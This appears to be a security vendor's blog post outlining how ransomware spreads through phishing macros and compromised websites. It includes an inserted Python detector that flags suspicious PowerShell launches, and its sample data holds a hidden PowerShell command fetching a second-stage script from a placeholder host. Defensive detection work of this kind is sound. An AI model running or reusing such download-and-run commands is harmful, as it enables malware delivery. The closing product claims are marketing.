By echoudhury77

How Ransomware Strikes

In December 2018 we predicted a rise in malware in 2019, especially ransomware, basing the forecast on aggregated threat intelligence and our analysis of threat vectors and vulnerabilities. Halfway into 2019, the already large number of high-profile ransomware attacks continues to climb.


Let’s take a look at two of the most prevalent and typical ways that businesses and organizations fall victim to this malware: phishing and compromised websites.


The Phishing attack:

  1. Carefully crafted phishing e-mails with an infected attachment are cast out in a wide net. In many cases they are socially engineered to target specific organizations and businesses, cleverly referencing an “invoice”, a “bill” or some other document that supposedly needs urgent review.

  2. An employee or a member of an organization receives the phishing e-mail in their mailbox and sees the attachment.

  3. The employee opens the attachment and allows macros to run, likely thinking it’s necessary in order to view the document.

  4. The attachment runs its macros directly in memory, without the user noticing anything unusual.

  5. The macros open a command line, which then loads a PowerShell script into memory.

  6. The PowerShell script downloads additional scripts and an encryption key.

  7. The new scripts encrypt the data on the computer, then move across file shares and encrypt any documents they can access.

  8. The user is presented with a notice of the attack and instructions on how to pay the ransom and obtain the decryption key to unlock the files.


The Compromised Website attack:

  1. An employee browses to a website that has been compromised and set up to distribute malware.

  2. The website runs code to check for vulnerable applications on the user’s computer.

  3. Vulnerable applications are exploited to start a command line without the user noticing anything is happening.

  4. The command line loads a PowerShell script into memory.

  5. The PowerShell script downloads additional scripts and an encryption key.

  6. The new scripts encrypt the data on the computer, then move across file shares and encrypt any documents they can access.

  7. The user is presented with a notice of the attack and instructions on how to pay the ransom and obtain the decryption key to unlock the files.
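Both chains above pass through the same choke point a defender can watch for: an Office application (phishing) or a browser (compromised website) spawning a command line that in turn launches a hidden PowerShell stage. The following detection script is an added example and not part of the original post; it walks constructed process-creation events (the field names and the sample data are assumptions, modelled on a Sysmon event 1 / Windows 4688 style feed) and flags PowerShell launches by parent lineage and by suspicious command-line traits.

```python
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
# Command-line traits typical of a hidden, download-and-run PowerShell stage.
SUSPICIOUS_ARGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-enc(odedcommand)?\b"
    r"|downloadstring|invoke-webrequest", re.IGNORECASE)

def lineage(by_pid, pid, depth=4):
    """Return [image, parent image, grandparent image, ...] for a pid."""
    chain = []
    while pid in by_pid and len(chain) < depth:
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events):
    """One alert per powershell.exe launched under Office/a browser or with 2+ suspicious traits."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if ev["image"].lower() != "powershell.exe":
            continue
        chain = lineage(by_pid, ev["pid"])
        ancestors = set(chain[1:])
        origin = ("office" if ancestors & OFFICE else
                  "browser" if ancestors & BROWSERS else None)
        flags = sorted({m.group(0).lower()
                        for m in SUSPICIOUS_ARGS.finditer(ev["cmd"])})
        if origin or len(flags) >= 2:
            alerts.append({"pid": ev["pid"], "origin": origin,
                           "chain": " <- ".join(chain), "flags": flags})
    return alerts

# Constructed sample events (not real logs); "ppid" links each process to its parent.
SAMPLE = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "outlook.exe", "cmd": "outlook.exe"},
    {"pid": 300, "ppid": 200, "image": "WINWORD.EXE", "cmd": 'WINWORD.EXE "invoice.doc"'},
    {"pid": 400, "ppid": 300, "image": "cmd.exe", "cmd": "cmd.exe /c ..."},
    {"pid": 500, "ppid": 400, "image": "powershell.exe", "cmd":
     "powershell.exe -w hidden -nop -c Invoke-WebRequest http://PLACEHOLDER.example/s2.ps1"},
    {"pid": 600, "ppid": 100, "image": "chrome.exe", "cmd": "chrome.exe"},
    {"pid": 700, "ppid": 600, "image": "cmd.exe", "cmd": "cmd.exe"},
    {"pid": 800, "ppid": 700, "image": "powershell.exe", "cmd": "powershell.exe -nop -c ..."},
    {"pid": 900, "ppid": 100, "image": "powershell.exe",  # benign admin script, not flagged
     "cmd": "powershell.exe -File C:\\Scripts\\backup.ps1"},
]
```

Running `detect(SAMPLE)` returns two alerts (the Office-spawned and the browser-spawned chains) and leaves the administrator's backup script alone; in production the same logic would be fed from the endpoint's process-creation telemetry.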

These two attack forms share several steps, but it’s important to remember that both exploit the weakest links: the human factor and the lack of advanced endpoint protection.


Most endpoint protection relies on signatures. Zero-day malware easily bypasses software that uses signatures to identify and block threats, leaving computers infected, and some organizations respond by installing multiple protection products, which is not only ineffective but also causes performance issues. As many have had the misfortune to discover, this approach to protection simply doesn’t work.


Deep-learning, AI-based endpoint protection reacts to threats based on malicious behavior rather than relying only on signatures of known malware, so encryption activity such as ransomware is stopped immediately.


Regular cybersecurity awareness training for employees is important in educating the front lines, so they’re more conscious about what they click on and can play a key part in protecting the organization and its digital assets.


Contact Firestorm Cyber for more information on the world’s best cybersecurity solutions that protect and defend against malware such as ransomware, and how to train your employees on cybersecurity awareness.


Firestorm Cyber is the world’s only Managed Security Service Provider (MSSP) to offer guaranteed protection globally against ransomware with a $1 Million warranty.
